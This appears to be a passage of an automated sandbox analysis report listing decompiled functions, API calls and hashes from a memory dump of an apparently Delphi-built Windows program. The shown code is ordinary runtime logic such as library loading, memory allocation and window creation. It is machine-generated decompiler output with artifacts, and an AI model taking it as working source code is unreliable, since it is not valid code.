Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: 73211
String ID:
API String ID: 2278683314-0
Opcode ID: 3eaad187d96bd7d5f167e7e88763bfcd67d7a239c4cb7c580fa5eb38c7902c90
Instruction ID: 6db42e9633ccc2a9c0b1df817b43b5bc78e029d9501da108c8f717f333312730
Opcode Fuzzy Hash: 3eaad187d96bd7d5f167e7e88763bfcd67d7a239c4cb7c580fa5eb38c7902c90
Instruction Fuzzy Hash: A8210E75A00649ABDB10EFE5CC818AEB7FCEB48704B514476B510F3691D738E905CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0049E4F4, Relevance: 4.6, APIs: 3, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0049E4F4(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				CHAR* _t26;
				intOrPtr _t31;
				intOrPtr* _t34;
				void* _t37;

				_t34 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404888(_v8);
				E00404888(_v12);
				_push(_t37);
				_push(0x49e589);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37 + 0xfffffff8;
				_t26 = E00404898(_v8);
				LoadLibraryA(_t26); // executed
				 *0x4bccb4 = GetModuleHandleA(_t26);
				if( *0x4bccb4 != 0) {
					0;
					0;
					_t22 = E00404898(_v12);
					_t23 =  *0x4bccb4; // 0x70600000
					 *_t34 = GetProcAddress(_t23, _t22);
				}
				_pop(_t31);
				 *[fs:eax] = _t31;
				_push(0x49e590);
				return E004043FC( &_v12, 2);
			}

0x0049e4fc
0x0049e4fe
0x0049e501
0x0049e507
0x0049e50f
0x0049e516
0x0049e517
0x0049e51c
0x0049e51f
0x0049e52f
0x0049e532
0x0049e53f
0x0049e54b
0x0049e553
0x0049e557
0x0049e55b
0x0049e561
0x0049e56c
0x0049e56c
0x0049e570
0x0049e573
0x0049e576
0x0049e588

APIs

LoadLibraryA.KERNEL32(00000000), ref: 0049E532
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0049E589), ref: 0049E53A
GetProcAddress.KERNEL32(70600000,00000000,00000000,00000000,00000000,0049E589), ref: 0049E567

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 02abbfa3be8336596ffbbf129f8e44e0f385e086389595b4da41da46cb3beb9e
Instruction ID: e6ce9a76aaa037106e1219a45c28da37e0540df83f0bec9e0e256ddc7eeeb9d6
Opcode Fuzzy Hash: 02abbfa3be8336596ffbbf129f8e44e0f385e086389595b4da41da46cb3beb9e
Instruction Fuzzy Hash: E10175B5504248AFD700FFB5CC8295D7BFCEB49314F52487AB904E3291EB385D008618

Uniqueness

Uniqueness Score: -1.00%

Function 00402490, Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 00401C34: RtlInitializeCriticalSection.KERNEL32(004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C4B
Part of subcall function 00401C34: RtlEnterCriticalSection.KERNEL32(004BC5CC,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C5E
Part of subcall function 00401C34: LocalAlloc.KERNEL32(00000000,00000FF8,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C88
Part of subcall function 00401C34: RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401D03,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401CF6

RtlEnterCriticalSection.KERNEL32(004BC5CC,00000000,0040262C), ref: 004024D9
RtlLeaveCriticalSection.KERNEL32(004BC5CC,00402633), ref: 00402626

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 536ab81e7a0168c150257fa6abde368d4904b7c8e39b364701b024b2e632bd7d
Instruction ID: c346414b2df36dfc1d78c9a94266e18d2ac5f313e2888cde79dd59751a18ab5d
Opcode Fuzzy Hash: 536ab81e7a0168c150257fa6abde368d4904b7c8e39b364701b024b2e632bd7d
Instruction Fuzzy Hash: 5D512FB5A00205EFDB10CF69DAC5A6EBBF1FB48314F24827AD444A73E1D378A941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401838, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401838(signed int __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v20;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t20;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t48;
				void** _t49;
				signed int* _t50;
				void** _t51;

				_t51 =  &_v24;
				_t39 = __ecx;
				 *_t51 = __edx;
				_t49 =  &_v32;
				_t48 =  &_v36;
				_t50 =  &_v28;
				_v24 = __eax & 0xfffff000;
				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
				 *__ecx = _v24;
				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
				_t20 =  *0x4bc5ec; // 0x2641b4
				 *_t48 = _t20;
				while(0x4bc5ec !=  *_t48) {
					_t10 =  *_t48 + 8; // 0x0
					 *_t49 =  *_t10;
					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
					if( *_t49 < _v24) {
						 *_t49 = _v24;
					}
					if( *_t50 > _v20) {
						 *_t50 = _v20;
					}
					if( *_t49 <  *_t50) {
						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
						if(_t35 == 0) {
							 *_t39 = 0;
							return 0;
						}
					}
					 *_t48 =  *((intOrPtr*)( *_t48));
				}
				return 0x4bc5ec;
			}

0x0040183c
0x0040183f
0x00401841
0x00401844
0x00401848
0x0040184c
0x0040185a
0x0040186d
0x00401875
0x0040187f
0x00401882
0x00401887
0x004018e6
0x0040188d
0x00401890
0x00401899
0x004018a2
0x004018a8
0x004018a8
0x004018b1
0x004018b7
0x004018b7
0x004018bf
0x004018d1
0x004018d8
0x004018dc
0x00000000
0x004018dc
0x004018d8
0x004018e4
0x004018e4
0x004018f6

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004018D1

Strings

dA&, xrefs: 0040183B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: dA&
API String ID: 4275171209-2347778391
Opcode ID: 150826bb40592e65ffcf6e1f8b672396795f8f1a2a44fe53c5a1e581b5545d04
Instruction ID: b9a4ff5faeac863311b4874415b1ca978e19cbac31c1212781f626a121146fc5
Opcode Fuzzy Hash: 150826bb40592e65ffcf6e1f8b672396795f8f1a2a44fe53c5a1e581b5545d04
Instruction Fuzzy Hash: E721DDB5604246DFC750DF2CC880A5AB7E4FF98350F24892AF998DB394E334EA44CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0040142C, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040142C() {
				void* _v8;
				intOrPtr* _v12;
				void* _t20;
				intOrPtr _t23;
				void _t28;
				intOrPtr* _t34;

				_t34 =  &_v12;
				if( *0x4bc5e8 != 0) {
					L5:
					_v12 =  *0x4bc5e8;
					 *0x4bc5e8 =  *_v12;
					 *_t34 = _v12;
				} else {
					_t20 = LocalAlloc(0, 0x644); // executed
					_v8 = _t20;
					if(_v8 != 0) {
						_t28 =  *0x4bc5e4; // 0x263b80
						 *_v8 = _t28;
						 *0x4bc5e4 = _v8;
						_t23 = 0;
						do {
							_t7 = (_t23 + _t23) * 8; // 0x4
							_v12 = _v8 + _t7 + 4;
							 *_v12 =  *0x4bc5e8;
							 *0x4bc5e8 = _v12;
							_t23 = _t23 + 1;
						} while (_t23 != 0x64);
						goto L5;
					} else {
						 *_t34 = 0;
					}
				}
				return  *_t34;
			}

0x0040142d
0x00401438
0x00401493
0x00401495
0x0040149f
0x004014a5
0x0040143a
0x00401441
0x00401446
0x0040144f
0x0040145c
0x00401462
0x00401468
0x0040146d
0x0040146f
0x00401477
0x0040147b
0x00401485
0x0040148b
0x0040148d
0x0040148e
0x00000000
0x00401451
0x00401453
0x00401453
0x0040144f
0x004014af

APIs

LocalAlloc.KERNEL32(00000000,00000644), ref: 00401441

Strings

dA&, xrefs: 0040142C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocLocal
String ID: dA&
API String ID: 3494564517-2347778391
Opcode ID: ac468a2ecd9c3d128b107ecaba18d31a886b19c35e28d549204fc5674e727de6
Instruction ID: 64bd595fae1296f2545ce3df9dffd7a57d75690bade7c4963c2cae610cb39c96
Opcode Fuzzy Hash: ac468a2ecd9c3d128b107ecaba18d31a886b19c35e28d549204fc5674e727de6
Instruction Fuzzy Hash: F311C574608712EFC710DF28C5C0A1AB7E1EB89714F10C97AE889DB3A4D334AC45DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0042964C, Relevance: 3.0, APIs: 2, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042964C(void* __eax, void* __ecx, void* __edx) {
				void* __ebx;
				void* _t8;
				void* _t16;

				_t16 = __eax;
				_t8 = E004284A4( *((intOrPtr*)(__eax + 0xc)), __eax, __ecx); // executed
				SelectObject( *(_t16 + 4), _t8);
				return SetTextColor( *(_t16 + 4), E00427FD0( *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc)) + 0x18))));
			}

0x0042964d
0x00429652
0x0042965c
0x00429677

APIs

Part of subcall function 004284A4: CreateFontIndirectA.GDI32(?), ref: 004285E2

SelectObject.GDI32(?,00000000), ref: 0042965C

Part of subcall function 00427FD0: GetSysColor.USER32 ref: 00427FDA

SetTextColor.GDI32(?,00000000), ref: 00429671

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$CreateFontIndirectObjectSelectText
String ID:
API String ID: 2338844261-0
Opcode ID: b302dbb00f3a1dd1fc2b4ad0904f1bc58baa0a317ac4faef4cd84db27569bc0e
Instruction ID: 835dba720a73490700537a1a8c9c5c8eb7b1b81763989f659865f169bb7124a0
Opcode Fuzzy Hash: b302dbb00f3a1dd1fc2b4ad0904f1bc58baa0a317ac4faef4cd84db27569bc0e
Instruction Fuzzy Hash: 4FD067B52041019FCB80EFA9E9C1D0AB3DCAF08214345C096B909DF257C639E8108728

Uniqueness

Uniqueness Score: -1.00%

Function 00401694, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401694(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004014B8(0x4bc5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401697
0x004016a1
0x004016b0
0x004016a3
0x004016a3
0x004016a3
0x004016b6
0x004016c3
0x004016c8
0x004016ca
0x004016ce
0x004016d7
0x004016de
0x004016ea
0x004016f1
0x00000000
0x004016f1
0x004016de
0x004016f6

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401A27), ref: 004016C3
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401A27), ref: 004016EA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 9309d6744b3797162936d0e15a13732a100c9587312e0d51053d2c7cba719e6d
Instruction ID: 67e0a518a30daea821aaf1b18209b496136ad716dca4c447260ed954f7b0fbab
Opcode Fuzzy Hash: 9309d6744b3797162936d0e15a13732a100c9587312e0d51053d2c7cba719e6d
Instruction Fuzzy Hash: 12F02773F0062057EB20556E4CC5F535584AF85790F18457BFA08FF3E9C6BA8C0182A9

Uniqueness

Uniqueness Score: -1.00%

Function 004075CA, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004075CA(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402D64();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402D54(_t13);
				return _t24;
			}

0x004075cf
0x004075d3
0x004075d8
0x004075da
0x0040760b
0x00407614
0x00407620

APIs

CreateWindowExA.USER32 ref: 0040760B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dc3614e55f8e1df82b08a6313e53d7c703585e5f93ed3a135a24a4fb7a62d870
Instruction ID: 345a5b142ef3e3774b86c424216de0b98c217a7697f0077a0adaed55d67508b6
Opcode Fuzzy Hash: dc3614e55f8e1df82b08a6313e53d7c703585e5f93ed3a135a24a4fb7a62d870
Instruction Fuzzy Hash: 20F0E2B2700158BF8B84DE9DDC85EDB77ECEB4C264B00412AFA0CE3240D274ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004075CC, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004075CC(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402D64();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402D54(_t13);
				return _t24;
			}

0x004075d3
0x004075d8
0x004075da
0x0040760b
0x00407614
0x00407620

APIs

CreateWindowExA.USER32 ref: 0040760B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6f48f4eaa7b80874825fab1aaad38068b930695a7f535d82713e1e7b48019517
Instruction ID: 84dc18e4f0b09838bf349d7c1d550884d200ef56795df12e2bd77435a6c5542b
Opcode Fuzzy Hash: 6f48f4eaa7b80874825fab1aaad38068b930695a7f535d82713e1e7b48019517
Instruction Fuzzy Hash: B5F0E2B2600158BF8B84DE9DDC85EDB77ECEB4C264B00412AFA0CE3240D274ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407624, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407624(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402D64();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402D54(_t12);
				return _t22;
			}

0x0040762b
0x00407630
0x00407632
0x00407661
0x0040766a
0x00407676

APIs

CreateWindowExA.USER32 ref: 00407661

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 08ef12f51244633bb1c0687d1fc64d596386d324027090b1cb99a2d6d50bee88
Instruction ID: 2b84ed3dde19c1704d65383766af515d67df567bec5425a6b7b556750179a4f6
Opcode Fuzzy Hash: 08ef12f51244633bb1c0687d1fc64d596386d324027090b1cb99a2d6d50bee88
Instruction Fuzzy Hash: E3F0F4B2704258BFCB90DE9EDC85E9B7BECEB4C264B00402ABA0CD3241D174ED108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040656C, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040656C(intOrPtr* __eax, void* __ecx, void* __edx) {
				char _v4104;
				intOrPtr* _t5;
				int _t12;
				void* _t21;
				void* _t22;

				_t5 = __eax;
				_t22 = _t21 + 0xfffff004;
				_push(__eax);
				_t20 = __edx;
				_t14 = __eax;
				if(__eax != 0) {
					if( *((intOrPtr*)(__eax + 4)) >= 0x10000) {
						_t4 = _t14 + 4; // 0xff8f
						_t5 = E004045D0(__edx,  *_t4);
					} else {
						_t3 = _t14 + 4; // 0xff8f
						_t12 = LoadStringA(E00405A30( *((intOrPtr*)( *__eax)), __ecx, __edx),  *_t3,  &_v4104, 0x1000); // executed
						_t5 = E004044C8(_t20, _t12, _t22);
					}
				}
				return _t5;
			}

0x0040656c
0x0040656e
0x00406574
0x00406575
0x00406577
0x0040657b
0x00406584
0x004065b2
0x004065b5
0x00406586
0x00406590
0x0040659e
0x004065a9
0x004065a9
0x00406584
0x004065c2

APIs

LoadStringA.USER32 ref: 0040659E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 551d0454f3aab5248df355c7ec886197bd1ce30b136bb346426f7988436fcd0d
Instruction ID: a42eb82e800fa1c1cf7f29c434b97c7b14ccf972573d21dc9e41fdab9b07e095
Opcode Fuzzy Hash: 551d0454f3aab5248df355c7ec886197bd1ce30b136bb346426f7988436fcd0d
Instruction Fuzzy Hash: B9F0A0B1300610EBCB10EA9DDCC1B4A33CC9F48358B048176B608EB3D9EA78DC5147AA

Uniqueness

Uniqueness Score: -1.00%

Function 00446BD0, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00446BD0(intOrPtr* __eax, void* __edx) {
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _t31;

				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *__eax + 0x44))();
				_push( *((intOrPtr*)(__eax + 0x48)) - _v20 +  *_t31);
				_push( *((intOrPtr*)(__eax + 0x4c)) - _v16 + _v32);
				return  *((intOrPtr*)( *__eax + 0x84))();
			}

0x00446bdb
0x00446bdc
0x00446be7
0x00446bf4
0x00446c00
0x00446c17

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 00446C0B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 3e450580647ac04c52fe3c9217b9489fe8f4b0b89d3e34e1a1c747df32f352d3
Instruction ID: 2b489bd349fd00ef9accd65a6c2d7a08998cef0b38985eff922cf8e7109b24d4
Opcode Fuzzy Hash: 3e450580647ac04c52fe3c9217b9489fe8f4b0b89d3e34e1a1c747df32f352d3
Instruction Fuzzy Hash: CDF0D4362042019FC704DF5CC8C498ABBE5FF89255F0446A8FA89CB356DA32E814CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004059E8, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059E8(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405C7C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}

0x004059f0
0x004059f6
0x00405a02
0x00405a06
0x00405a0f
0x00405a14
0x00405a16
0x00405a1b
0x00405a1d
0x00405a20
0x00405a20
0x00405a1b
0x00405a23
0x00405a2e

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405A06

Part of subcall function 00405C7C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,004A00A4), ref: 00405C97
Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CB5
Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CD3
Part of subcall function 00405C7C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CF1
Part of subcall function 00405C7C: RegQueryValueExA.ADVAPI32 ref: 00405D3A
Part of subcall function 00405C7C: RegQueryValueExA.ADVAPI32 ref: 00405D58
Part of subcall function 00405C7C: RegCloseKey.ADVAPI32(?), ref: 00405D7A

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 40ccd576ff6b02428b8365bdedf29127b821b7a5abaf49abdfba1af39e21b84e
Instruction ID: 2f7e4bde55ec2de3ee04da6a633fa8bae053b42807b2895838920d550eb3db44
Opcode Fuzzy Hash: 40ccd576ff6b02428b8365bdedf29127b821b7a5abaf49abdfba1af39e21b84e
Instruction Fuzzy Hash: BAE06D71A007148BDB10DE5CD8C1A8733D8AB09754F000AA6AC54EF386D3B8DD108BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00408A60, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408A60(void* __eax, void* __edx) {
				int _t3;
				char* _t5;
				int _t7;
				int _t10;
				void* _t12;

				_t12 = __eax;
				_t3 = E00404698(__edx);
				_t5 = E00404898(__edx);
				_t7 = E00404698(_t12);
				_t10 = CompareStringA(0x400, 1, E00404898(_t12), _t7, _t5, _t3); // executed
